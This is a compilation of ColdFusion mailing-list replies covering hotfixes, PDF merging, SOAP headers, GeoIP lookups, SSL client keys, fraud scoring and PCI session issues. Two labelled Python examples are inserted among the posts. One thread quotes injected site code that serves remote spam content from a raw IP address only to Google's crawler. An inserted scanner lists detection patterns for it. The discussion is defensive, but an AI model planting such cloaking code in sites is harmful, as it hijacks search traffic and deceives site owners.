Re: Upgrading CF9 Hotfixes
Hi Richard,

Are you renaming any existing jar files or removing them completely? I have run into issues when the old hotfix files are just renamed; you should remove them from the folder completely (i.e. the ones in the UPDATES folder). Ensure that you have them backed up in another location though, in case you need to restore them.

Best Regards,
Donnie

Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer
==
The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer.

On Thu, Feb 13, 2014 at 2:52 PM, Richard White rich...@re-base.net wrote:

> Hi,
>
> I am having a lot of problems trying to upgrade hot fixes. I currently have 9.01 installed. I have downloaded 9.01 hot fix as described here: http://helpx.adobe.com/coldfusion/kb/security-hotfix-coldfusion-8-8.html. However, after applying the changes the CF Admin stops working and just shows a blank page. I have followed the instructions diligently so wondered what else may be going wrong.
>
> I tried to apply the 9.02 update but again the CF admin stopped working and showed an error: 'Class not found: coldfusion.security.ESAPIUtils'
>
> I am lost as to what to try next and what the issue is. I think there were 4 hot fixes for 9.01? Do I need to load them one at a time in order, and then apply the 9.02 update?
>
> Thanks for any help or pointers,
> Richard

Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:357674
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: generating and merging pdfs
Hi Tim,

I tend not to use CF for anything like this. I've used ghostscript and pdftk to perform pdf merging with great success. See http://stackoverflow.com/questions/8158584/ghostscript-to-merge-pdfs-compresses-the-result for an example of usage commands for both ghostscript and pdftk (http://www.pdflabs.com/tools/pdftk-server/). If you're on linux either will work but on Windows you'll have to go with pdftk.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Mon, Jan 6, 2014 at 7:28 PM, Tim Do t...@wng.com wrote:

> I'm using cfpdf to merge roughly 3000 pdfs (50kb each). These pdfs were generated using cfdocument which only takes a couple of minutes. The issue I'm having now is when merging these pdfs, it's taking down the server. I'm getting:
>
> Unable to instantiate com.adobe.internal.pdftoolkit.pdf.page.PDFPageLabels object from CosObject.
>
> Looks like I get to around 1600 pdfs which is about 40mbs. Is there another method I should be using for this monthly and quarterly process? We're trying to mail of statements. Any input would be greatly appreciated. We're on cf9 here.
>
> Thanks,
> Tim

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:357410
Re: Call of a soap webservice passing headers
Have you tried the addSOAPRequestHeader function? Use this in conjunction with createObject to pass the username and password to the service. See http://livedocs.adobe.com/coldfusion/8/htmldocs/help.html?content=functions_a-b_03.html

HTH.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Fri, Feb 22, 2013 at 9:13 PM, Stephane Vantroyen s...@ecode23.be wrote:

> Hello,
>
> usually I have no problem consuming webservices, but this time I don't understand what I do wrongly; before being able to call any method, I should login, passing username and password in the soap headers; and there comes the pain: I try to call it via createObject, cfinvoke or even with cfhttp like mentioned in this post ( http://blog.brijeshradhika.com/2011/04/consuming-webservice-using-coldfusion.html ), I can't make it work. The documentation of the webservice provides a php example (see below). Anyone of you guys being able to translate into Coldfusion code?
>
> Thanks in advance
>
>     /* Create the UsernameToken class */
>     class UsernameToken {
>         public $Username;
>         public $Password;
>
>         public function __construct($username, $password) {
>             $this->Username = $username;
>             $this->Password = $password;
>         }
>     }
>
>     /* Initialise the SOAP client */
>     $client = new SoapClient('http://www.thesite.nl/api/thesite.wsdl', array('trace' => 1));
>
>     /* Send user authentication headers */
>     $ut = new UsernameToken('username', 'password');
>     $soapHeaders[] = new SoapHeader('http://schemas.xmlsoap.org/ws/2002/07/utility/', 'UsernameToken', $ut);
>     $client->__setSoapHeaders($soapHeaders);

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354660
Re: SOT: IP Geolocation APIs
Hi Justin,

If you have a budget available I would recommend http://www.maxmind.com/en/geolocation_landing. We use the downloadable database.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Feb 5, 2013 at 5:02 PM, Justin Scott leviat...@darktech.org wrote:

> > What about using geolocation on the client itself? Roughly 82% of your audience will support it.
>
> The situation I'm working with is dealing with historical data.
>
> -Justin

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354311
Re: AW: Severe memory issue
Hi Till,

What version of CF are you on? I had some issues with memory in CF8 and outlined a few tips: http://thinkinglemur.com/index.php/2010/02/memory-leaks-with-coldfusion-8/. If you are doing heap dumps, look for objects that hold huge amounts of memory; the blog post has links to a couple of sites that talk about how to make sense of the heap dumps. If there are objects that make reference to session/application scoped variables/objects this can also be a cause of memory leaks and server crashes.

HTH
Donnie

On Wed, Jan 30, 2013 at 10:39 AM, Helwig, Till Helge till.hel...@saxsys.de wrote:

> Hi,
>
> This doesn't look like any UUID I ever encountered before: 709565bc370.f5330048ffa80212
>
> I will ask the DBA if there is any way of generating those things with a stored procedure, but I don't expect a positive answer, to be quite honest.
>
> Greetings,
> Till Helge

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354120
Re: Source control in CF
I agree with Cameron on this one. We recently moved from SVN to Git because we found that within our team it facilitated our workflow. We started implementing the practices outlined by Git Flow and that's been working really well. That doesn't mean that Git is better than SVN, it's just better in our case. One thing I do like is the fact that I can work on my local machine and then sync with the server when I'm connected at the office again.

Best Regards,
Donnie

On Wed, Jan 30, 2013 at 2:23 PM, Cameron Childress camer...@gmail.com wrote:

> On Wed, Jan 30, 2013 at 4:42 AM, Adam Cameron wrote:
>
> > Before you go too far down the SVN route...
>
> To me, Git vs SVN is sort of like a Mac vs PC argument. Git is good, SVN is good. They are both VERY VERY widely used and I expect both to be heavily used for the foreseeable future. Like most technology questions, there is not just one right answer.
>
> To the OP - read up on Git and SVN and pick whichever you like, but don't feel bad in the least about choosing either one as a solution. They are both perfectly fine choices. In fact, if you are struggling to understand getting SVN setup, I think that Git may be an even more painful option for you (but give it a whirl and form your own opinion).
>
> -Cameron
>
> --
> Cameron Childress

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354132
Re: SQL Express and CF
You'll need to purchase the developer edition for SSIS. It's not free but has full standard level features and is pretty affordable: $50 US at NewEgg http://www.newegg.com/Product/Product.aspx?Item=N82E16832416455Tpk=sql%20server%20developer

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Fri, Nov 16, 2012 at 4:22 PM, Carl Von Stetten vonner.li...@vonner.net wrote:

> I spoke too soon. The installer with tools provides limited replication support and SSMS, but not SSIS.
>
> -Carl V.
>
> On 11/15/2012 4:30 PM, Carl Von Stetten wrote:
>
> > Starting with SQL Server Express 2008 R2 (and maybe some prior versions), you can download an installer that includes the SSMS tools, which I think includes SSIS as well.
> >
> > -Carl V.
> >
> > On 11/15/2012 1:32 PM, Mike Kear wrote:
> >
> > > the things cut out of the express version are the kinds of things we use coldfusion for anyway. I haven't found any issues at all in connecting SQLexpress versions and Coldfusion. The only issues I've had are to do with things like the lack of SSIS which makes things like moving data to online more difficult, that's all.
> > >
> > > Cheers
> > > Mike Kear
> > > Windsor, NSW, Australia
> > >
> > > On Fri, Nov 16, 2012 at 6:32 AM, Pete Ruckelshaus pruckelsh...@gmail.com wrote:
> > >
> > > > Works just like the full version, and it's what I use on my VPS.
> > > >
> > > > On Thu, Nov 15, 2012 at 5:23 AM, Kevin Parker tras...@internode.on.net wrote:
> > > >
> > > > > Are there any issues using Express versions of SQL Server for development?
> > > > >
> > > > > Thank you
> > > > >
> > > > > Kevin Parker

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353208
Re: Anybody seen this hack/exploit?
I've seen something like this on a shared server that was running osCommerce. The uploads directory had the wrong permissions set, the attacker uploaded a server admin script that could set permissions on other directories. They were then able to inject code into every index.php, index.html, index.cfm files it found. If you are on a shared environment I would look for this type of attack on the server.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Nov 13, 2012 at 9:56 PM, Yuliang Ruan yuliangr...@hotmail.com wrote:

> Recently a site of ours got hacked - basically, a Google search the site was returning viagra info! What we got was a small script added to the end of a functions.cfm file:
>
>     <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
>     <cfif (Find( "google", REQUEST.UserAgent ))>
>         <cfhttp method="get" url="http://168.16.228.250/fms/">
>         <cfoutput>#cfhttp.filecontent#</cfoutput>
>     </cfif>
>
> I'm not the server admin for this site, so they're sorta pointing the finger at us developers, and we're pointing fingers back at them about lax server security. We've got a boatload of stuff on this site to prevent SQL injection, including Justin D. Scott's application script, carefully checking anything to goes into the database, client and server side form validation, blah, blah, blah...
>
> Anybody seen the above, and if so, thoughts? Anybody manage to determine how the exploit happened to start with?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353149
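An added example, not part of the original thread: a small Python scanner for the pattern discussed in the message above, where a template reads the user agent, checks for a search-engine crawler, fetches a remote URL and echoes the response. The indicator names, the list of file extensions and the sample files (which use documentation-range addresses) are constructed assumptions.

```python
"""Flag web templates that fetch remote content only for search-engine crawlers."""
import os
import re
import tempfile

# File types named in the thread as injection targets (index.php/.html/.cfm, functions.cfm).
TEMPLATE_EXTS = {".cfm", ".cfc", ".php", ".html", ".htm"}

# Each indicator is weak on its own; the combination is what the injected snippet looked like.
INDICATORS = {
    "reads_user_agent": re.compile(r"cgi\.http_user_agent|HTTP_USER_AGENT", re.I),
    "crawler_check": re.compile(r"google|bing|yahoo|slurp|baidu", re.I),
    "remote_fetch": re.compile(
        r"<cfhttp\b[^>]*\burl\s*=\s*[\"']?https?://"
        r"|file_get_contents\s*\(\s*[\"']https?://", re.I),
    "echoes_response": re.compile(r"cfhttp\.filecontent|\becho\b|\bprint\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
}
CLOAKING = {"reads_user_agent", "crawler_check", "remote_fetch", "echoes_response"}


def classify(text):
    """Return (severity, indicators): 'high' for the full cloaking combination,
    'review' for a remote fetch from a bare IP address, None otherwise."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if CLOAKING <= hits:
        return "high", sorted(hits)
    if {"remote_fetch", "raw_ip_url"} <= hits:
        return "review", sorted(hits)
    return None, sorted(hits)


def scan_tree(root):
    """Walk a web root and return sorted (relative_path, severity, indicators) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEMPLATE_EXTS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                severity, hits = classify(fh.read())
            if severity:
                findings.append((os.path.relpath(path, root), severity, hits))
    return sorted(findings)


# Constructed samples. The first mirrors the shape of the snippet quoted in the thread.
SAMPLE_INJECTED = (
    '<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />'
    '<cfif (Find( "google", REQUEST.UserAgent ))>'
    '<cfhttp method="get" url="http://192.0.2.10/fms/">'
    '<cfoutput>#cfhttp.filecontent#</cfoutput></cfif>'
)
SAMPLE_CLEAN = ('<cfhttp method="get" url="https://api.example.com/rates">'
                '<cfset rates = cfhttp.filecontent>')
SAMPLE_PHP = '<?php echo file_get_contents("http://198.51.100.7/links.txt"); ?>'


def demo():
    """Build a throwaway web root from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        files = {
            "functions.cfm": "<cfset x = 1>\n" + SAMPLE_INJECTED,
            "rates.cfm": SAMPLE_CLEAN,
            os.path.join("uploads", "index.php"): SAMPLE_PHP,
            "notes.txt": SAMPLE_INJECTED,  # not a template extension, so skipped
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, severity, hits in demo():
        print(f"{severity:6} {path}  {', '.join(hits)}")
```

Matches are leads for manual review; comparing flagged files against a known-good copy from source control confirms whether the code was injected.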
Invoking Java component that sends SSL Client Key in CF9 Ent
Hi All,

I've run into an issue on CF9 Enterprise 64 bit on Windows (7/2003/2008) with using client authentication when invoking a java component.

Background: We are attempting to implement 3D Secure (Verified By Visa) on the Barclay's EPDQ system using the Arcot SDK. We have this working using the COM api on windows 32 bit but our shiny new servers running Windows 2008 doesn't support COM. I've attempted to use .NET thinking that it should be a fairly straight swap between the COM and .NET systems but was I wrong.

The Java SDK requires you to pass in 3 SSL files: a CA certificate, a client certificate and a client key file. The following code illustrates the call from ColdFusion to the SDK:

    var serverInfo = createObject("java", "com.arcot.xfms.XFMS_Java_API$ServerInfo").init(
        VARIABLES.clientOptions.host,
        VARIABLES.clientOptions.port,
        VARIABLES.clientOptions.transport,
        30, 5, 8, 4,
        VARIABLES.clientOptions.TrustedCACertFile,
        VARIABLES.clientOptions.ClientCertFile,
        VARIABLES.clientOptions.ClientKeyFile);

This returns an error: Cannot get key bytes, not PKCS#8 encoded. If, however, I wrap this in a java class and execute from command line it works just fine. It just refuses to work when called from ColdFusion.

Attempted Fixes:

1. I've imported the certificates into every keystore on the server!
2. Created a jks keystore that includes the CA, Client Certificate and Client Key file and passed that in
3. Created a wrapper class in java that then instantiates and calls the SDK - this again works from command line but not from CF
4. Updated the JRE to Java6 R35 and tested both the command line and CF versions, pure java works, CF doesn't
5. Enabled SSL between JRUN and Apache (in dev environment) and still nothing
6. Contacted Barclays and Arcot and the official position is they neither officially support 64 bit Windows (which is INSANE!) or ColdFusion and can't really offer much advice. They suggested that it could be a problem with accessing the SDK from Coldfusion but I've moved the SDK to the same directory as the web root and still nothing.

Has anyone had any experience with this? Any thoughts, suggestions, criticisms? I can provide more code if necessary. Thanks very much.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352799
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Hi Paul,

Thanks for this, it's odd: we use Cardinal when we call Paypal Pro (we use them as a back up processor if Barclays ever goes down) and that works fine on 64 bit. What's even more odd is the fact that they all use Arcot at the core because Arcot developed the system.

Best Regards
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Oct 2, 2012 at 11:29 AM, Paul Kukiel pkuk...@gmail.com wrote:

> Unsure if it's an option but we use 3d secure with cardinal commerce who support ColdFusion and 64 bit.
>
> Paul

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352803
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Hi Paul,

Thanks for this, it's odd: we use Cardinal when we call Paypal Pro (we use them as a back up processor if Barclays ever goes down) and that works fine on 64 bit. What's even more odd is the fact that they all use Arcot at the core because Arcot developed the system.

Best Regards

On Tue, Oct 2, 2012 at 11:29 AM, Paul Kukiel pkuk...@gmail.com wrote:

> Unsure if it's an option but we use 3d secure with cardinal commerce who support ColdFusion and 64 bit.
>
> Paul

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352805
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Thanks Dave,

You just pass the location of the key file as a string so I'm just passing in C:\wamp\.\ClientKey.pem both in CF and Java class. I've tried using Wireshark as well to look at the packets being sent. From Java the request is fine, from CF the remote URL never gets called at all so it's not even getting to the bit where it makes the request.

What I don't understand is why it's throwing the same error when I use a wrapper java class that then invokes the SDK. Even if I hard code the paths to the files in the java wrapper class and all CF does is call the wrapper class I get the same error. I'm thinking it may be some sort of permission issue why it can't read the key file but I can't figure out what to change. CF and Java and Apache all have full permissions on the directories.

Donnie Bachan

> > This returns an error: Cannot get key bytes, not PKCS#8 encoded. If, however, I wrap this in a java class and execute from command line it works just fine. It just refuses to work when called from ColdFusion.
>
> How are you providing the key file to the Java class from within CF? Are you just reading it via CFFILE? I suspect that's the problem, although I don't know what the solution would be exactly. When you execute the Java class from the command line, how are you providing the file in that case?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352810
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

Pete,

Thanks very much. I think your note about RSA BSafe may be the issue since the symptoms seem to be pointing to something that CF can't handle. I can test this tomorrow. I'll post the stack trace when I'm back at work.

Best Regards,
Donnie

On Tue, Oct 2, 2012 at 6:32 PM, Pete Freitag p...@foundeo.com wrote:

> My guess is that this has something to do with the RSA BSafe crypto-j security provider that CF Enterprise ships with. This API was upgraded in CF10, so you could try that as an option.
>
> When you run Java from the command line, you are not using Crypto-J, when you run java within CF you are.
>
> Another thing to try would be CF Standard since CF standard uses the default Java security provider. You might also be able to have CF9 Ent run with the default security provider via some JVM options.
>
> Also can you post the full stack trace for the error you are getting in CF?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352814
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Thanks Russ,

I've not played with JSP in years, will give it a shot. I'm willing to even try Pascal at this point!

On Tue, Oct 2, 2012 at 8:37 PM, Russ Michaels r...@michaels.me.uk wrote:

> Don't forget that you are using jrun which also allows you to use jsp as well, perhaps you could try doing this from jsp and see if that works, which may save you some head banging as cfm and jsp can happily work together.
>
> Regards
> Russ Michaels

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352815
Re: Invoking Java component that sends SSL Client Key in CF9 Ent
Pete and Dave,

I owe both of you a beverage (or ten!) next time I'm in the US or you are in the UK! It was the BSafe library. I used the code from the forum post to disable the library and my requests worked. I will have to look into the compliance issue with disabling the library when making the calls but at least I know where the problem lies!

Thanks again!
Donnie

On Tue, Oct 2, 2012 at 11:48 PM, Dave Watts dwa...@figleaf.com wrote:

> > My guess is that this has something to do with the RSA BSafe crypto-j security provider that CF Enterprise ships with. This API was upgraded in CF10, so you could try that as an option.
> >
> > When you run Java from the command line, you are not using Crypto-J, when you run java within CF you are.
> >
> > Another thing to try would be CF Standard since CF standard uses the default Java security provider. You might also be able to have CF9 Ent run with the default security provider via some JVM options.
>
> Also, you can temporarily disable BSafe, I think, as described by Jason Dean here: http://forums.adobe.com/message/3895416

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352830
Re: CF8 Instance hogs cpu
Hi Richard,

I wrote a post a while back about memory leaks in CF8 Ent.; although it is not specifically related to high CPU usage, some of the settings here may be of help: http://thinkinglemur.com/index.php/2010/02/memory-leaks-with-coldfusion-8/

The two things that helped the most (aside from refactoring code) were updating the JVM and using -XX:+AggressiveHeap.

Is this only happening on 1 specific instance? What about the other instances on the server, are they fine? Do they interact with the instance that is having issues?

HTH.
Donnie

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352834
Re: credit card fraud
We handle credit card (and UK direct debit) fraud by assigning a fraud score to every single credit card submission. We generate the score at the time of purchase by using MaxMind and checking if the billing address of the credit card matches the IP country, checking if the billing is one of the high fraud countries and a few other historical items (delivery addresses etc). If the total fraud score crosses a threshold the orders are put into a holding table and are reviewed by someone to determine if the orders do look dodgy. If they are false positives then we allow them to be processed, if not we reject the order. We do pre-authorisations on the card so we never store the CC information during the review process.

Someone mentioned using 3D Secure and that has helped us out a lot in reducing spam. We've seen it all from Vietnam to Ghana and even a few originating in the US with US credit cards but with shipping addresses in the Far East or Africa. We also block certain known IPs/cards/countries and display a message that there was a problem with the order, please call us to complete the purchase. Legit customers call, fraudsters don't!

Our system works pretty well and doesn't rely on systems that may prevent legit people from submitting forms, which to be honest prevents bot spamming but doesn't help much with credit card/payment fraud.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Thu, Aug 23, 2012 at 10:00 PM, Casey Dougall - Uber Website Solutions ca...@uberwebsitesolutions.com wrote:

On Thu, Aug 23, 2012 at 4:54 PM, Byron Mann byronos...@gmail.com wrote:

http://www.maxmind.com/app/ccfd_features this is a pretty good service and very affordable. You might be able to hit them up for a free account if you are a non profit.

This is also built into Authorize.net as well. It's an option something like an extra 10 or 15 a month.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352304

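Added example, not part of the original posts or the poster's system: a sketch of the score-then-review flow described in the message above. The weights, threshold, placeholder country code "ZZ", function names and the keyed-hash card fingerprint (used here so a card can be blocklisted without storing its number) are all assumptions.

```python
import hashlib
import hmac
from dataclasses import dataclass, field

# Weights, threshold and country codes are constructed for illustration only;
# the post does not give its real values.
WEIGHTS = {
    "ip_billing_country_mismatch": 40,
    "high_fraud_billing_country": 30,
    "delivery_country_differs": 25,
    "unseen_delivery_address": 15,
}
REVIEW_THRESHOLD = 50
HIGH_FRAUD_COUNTRIES = {"ZZ"}  # placeholder ISO code


@dataclass
class Order:
    client_ip: str
    ip_country: str        # country a GeoIP lookup returned for client_ip
    billing_country: str
    delivery_country: str
    delivery_address: str
    card_number: str       # held in memory only, to derive a fingerprint


@dataclass
class Blocklists:
    ips: set = field(default_factory=set)
    countries: set = field(default_factory=set)
    card_fingerprints: set = field(default_factory=set)


def normalise_address(address):
    """Case-fold and collapse whitespace so trivial edits do not look new."""
    return " ".join(address.lower().split())


def card_fingerprint(card_number, key):
    """Keyed hash of the card digits (assumed design, not from the post)."""
    digits = "".join(ch for ch in card_number if ch.isdigit())
    return hmac.new(key, digits.encode("ascii"), hashlib.sha256).hexdigest()


def fraud_score(order, seen_addresses):
    """Return (score, reasons) for one submission."""
    reasons = []
    if order.ip_country != order.billing_country:
        reasons.append("ip_billing_country_mismatch")
    if order.billing_country in HIGH_FRAUD_COUNTRIES:
        reasons.append("high_fraud_billing_country")
    if order.delivery_country != order.billing_country:
        reasons.append("delivery_country_differs")
    if normalise_address(order.delivery_address) not in seen_addresses:
        reasons.append("unseen_delivery_address")
    return sum(WEIGHTS[r] for r in reasons), reasons


def decide(order, blocklists, seen_addresses, key):
    """Blocklist hits short-circuit; otherwise compare the score to the threshold."""
    if (order.client_ip in blocklists.ips
            or order.ip_country in blocklists.countries
            or card_fingerprint(order.card_number, key) in blocklists.card_fingerprints):
        return {"action": "ask_customer_to_call", "score": None, "reasons": ["blocklisted"]}
    score, reasons = fraud_score(order, seen_addresses)
    action = "hold_for_review" if score >= REVIEW_THRESHOLD else "process"
    return {"action": action, "score": score, "reasons": reasons}


# Constructed sample data: documentation IP ranges and well-known test card numbers.
KEY = b"constructed-demo-key"
SEEN = {normalise_address("1 Example Street, London")}
BLOCK = Blocklists(
    ips={"203.0.113.9"},
    card_fingerprints={card_fingerprint("4000 0000 0000 0002", KEY)},
)


def sample_decisions():
    orders = {
        "regular": Order("198.51.100.7", "GB", "GB", "GB",
                         "1 example street,  London", "4111 1111 1111 1111"),
        "mismatch": Order("198.51.100.8", "ZZ", "US", "ZZ",
                          "9 Constructed Road", "4111 1111 1111 1111"),
        "blocked_card": Order("198.51.100.9", "GB", "GB", "GB",
                              "1 Example Street, London", "4000-0000-0000-0002"),
    }
    return {name: decide(o, BLOCK, SEEN, KEY) for name, o in orders.items()}


if __name__ == "__main__":
    for name, decision in sample_decisions().items():
        print(name, decision)
```
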
Re: Modern (and free) html/cf editor that is similar to Homesite?
I know this option isn't free but you may want to contact them and see if you can work something out with them since it's for educational use.

http://www.sublimetext.com/

This is probably the best editor I've ever used. It is very similar to Homesite in many respects but it just takes it to a thousand levels up!

HTH.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Sun, Aug 19, 2012 at 5:46 PM, Larry Lyons larrycly...@gmail.com wrote:

I teach web design and web programming at a public high school. I have been using homesite for my classes, but it doesn't play well in our environment (locked down C drive, network drives...trust me, it has issues). Are there any current text editors that play well with HTML, CSS, JavaScript, and CF, that are also free? It doesn't need to be a super heavy duty app like Eclipse, in fact, I tried that with my web design class and it was a nightmare because of its complexity. Platform is WinXP.

Thanks for any suggestions,
Pete

NotePad ++ has a CFML plugin. Also if you install Eclipse with the Webtools plugin that will cover HTML/JS/CSS, and use CFEclipse to handle the CFML portion.

hth,
larry

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:352198

Re: Failed PCI Compliance test on CF9.01
Robert,

This is odd that you are losing the session, are you using CF in multiserver mode or standalone? The article you referenced was for CF8, however, we're currently running CF9 Ent in multiserver mode and we've not had this issue crop up. We are however using a DB with client cookies for managing state across CF instances.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Mar 6, 2012 at 2:17 PM, Che Vilnonis ch...@asitv.com wrote:

Robert, a product like Fuseguard from Pete Freitag or a Web Application Firewall (or a plugin type of filter to your existing firewall) may help. I'm currently going through a similar process and thought these options might help.

Ché

-Original Message-
From: Robert Rhodes [mailto:rrhode...@gmail.com]
Sent: Tuesday, March 06, 2012 9:08 AM
To: cf-talk
Subject: Re: Failed PCI Compliance test on CF9.01

Justin, thanks for the reply, and I get your point, but I can't break out the registration process into a standalone site quickly. There must be a fairly quick solution to this problem. Surely, I can't be the first to deal with this.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:350255

Re: Failed PCI Compliance test on CF9.01
Justin,

I don't think that would work though, depending on the level of compliance and the SAQ being completed I don't think any vendor will allow that exemption regardless of if credit card information is visible or not. If an attacker is allowed any access to a user session and can harvest any personally identifiable information it could affect security of any credit card entered into the site.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Mar 6, 2012 at 2:41 PM, Justin Scott leviat...@darktech.org wrote:

Justin, thanks for the reply, and I get your point, but I can't break out the registration process into a standalone site quickly. There must be a fairly quick solution to this problem. Surely, I can't be the first to deal with this.

Another option might be to ask your scanning vendor for an exception to that scanning rule. If you can demonstrate to them that no credit card information is accessible through the user's account (e.g. the card number isn't visible anywhere, etc., and it really doesn't matter if the session is hijacked from the standpoint of credit card security) and explain the situation, they are generally willing to work with you on this kind of thing.

Remember, their scanning rules are designed to cover the widest possible threat model. If you have specific needs that don't fit into that model but have compensating controls in place, it shouldn't be a problem (e.g. this used to be an issue with the incremental session IDs which the scanners check for, but paired with the random session token as a compensating control they would always make an exception for this rule when asked).

-Justin Sco

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:350260

Re: Failed PCI Compliance test on CF9.01
Hi Robert,

I'm not sure if I'm missing something but shouldn't you have setClientCookies to Yes? Otherwise you'd have to pass the JSESSIONID in the url on each request.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Tue, Mar 6, 2012 at 3:33 PM, Robert Rhodes rrhode...@gmail.com wrote:

For both Phillip and Donnie -- I just set the site up for database storage for the client session in the cf admin (server settings - client variables), and I see data going in those two tables, but I am still losing the session state when moving from https to http.

I have this set in my application.cfm:

clientmanagement=Yes
sessionmanagement=Yes
setclientcookies=No
clientstorage=MyDSN

What am I doing wrong?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:350268

Re: GeoIP for Coldfusion?
Although this isn't a completely free solution we've used it with very good success without any updates for a while now. http://www.maxmind.com/app/geoip_features. If you are using it for just country level access for $50 it's not a bad investment. I've included some code for checking the IP, once you have the database loaded. Please note that the java database is much, much faster than using the data in a database table.

<cffunction name="getIsBadIP" access="public" returntype="boolean" output="false">
    <cfargument name="theIP" default="" required="false" type="string" />

    <cfset var isBadIP = false />
    <cfset var clientip = arguments.theIP />
    <cfset var aIPParts = '' />
    <cfset var iIPNum = '' />
    <cfset var getIP = '' />
    <cfset var getBlackListed = '' />

    <!--- If no IP passed use CGI.REMOTE_ADDR if exists --->
    <cfif not len(clientIP)>
        <cfif structKeyExists(CGI, "REMOTE_ADDR") and len(CGI.REMOTE_ADDR)>
            <cfset clientip = CGI.REMOTE_ADDR />
        </cfif>
    </cfif>

    <!--- Check that this is a valid country, if not no actions to be performed --->
    <!--- Perform the GEOIP limiting --->
    <!--- Check if the IP address is provided --->
    <cfif len(clientIP)>
        <cfset aIPParts = listToArray(clientip, ".") />
        <cfif arrayLen(aIPParts) eq 4 and isNumeric(aIPParts[1]) and isNumeric(aIPParts[2]) and isNumeric(aIPParts[3]) and isNumeric(aIPParts[4])>
            <!--- Convert the dotted quad to the integer form used by the GeoIP ranges --->
            <cfset iIPNum = (aIPParts[1] * (256^3)) + (aIPParts[2] * (256^2)) + (aIPParts[3] * (256^1)) + (aIPParts[4]) />
            <cfquery name="getIP" datasource="#getDatasource()#">
                SELECT TOP 1 country
                FROM GeoIP
                WHERE CAST(#iIPNum# AS bigint) between CAST(begin_num AS bigint) and CAST(end_num AS bigint)
            </cfquery>
            <!--- Check if the country is in the bad range --->
            <cfif getIP.recordcount>
                <cfquery name="getBlackListed" datasource="#getDatasource()#">
                    SELECT *
                    FROM countryBlacklist
                    WHERE country = <cfqueryparam cfsqltype="cf_sql_varchar" value="#getIP.country#" />
                </cfquery>
                <cfif getBlackListed.recordcount>
                    <cfset isBadIP = true />
                </cfif>
            </cfif>
        </cfif>
    </cfif>

    <cfreturn isBadIP />
</cffunction>

Hope this helps.

Best Regards,
Donnie Bachan
Nitendo Vinces - By Striving You Shall Conquer

On Sun, Dec 25, 2011 at 5:56 AM, Phillip Vector vec...@mostdeadlygame.com wrote:

Is there a server side solution for GeoIP that I can use? I'd like to make up some CF code that can detect when sites are connecting in areas we don't serve and direct them to a different page. Is there any (free) solutions for ColdFusion to detect where an IP is located?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:349237

Re: GeoIP for Coldfusion?
FYI, http://www.maxmind.com/app/geolitecity, best to check with them about your particular use case to ensure you are good to use the free version.

Best Regards,
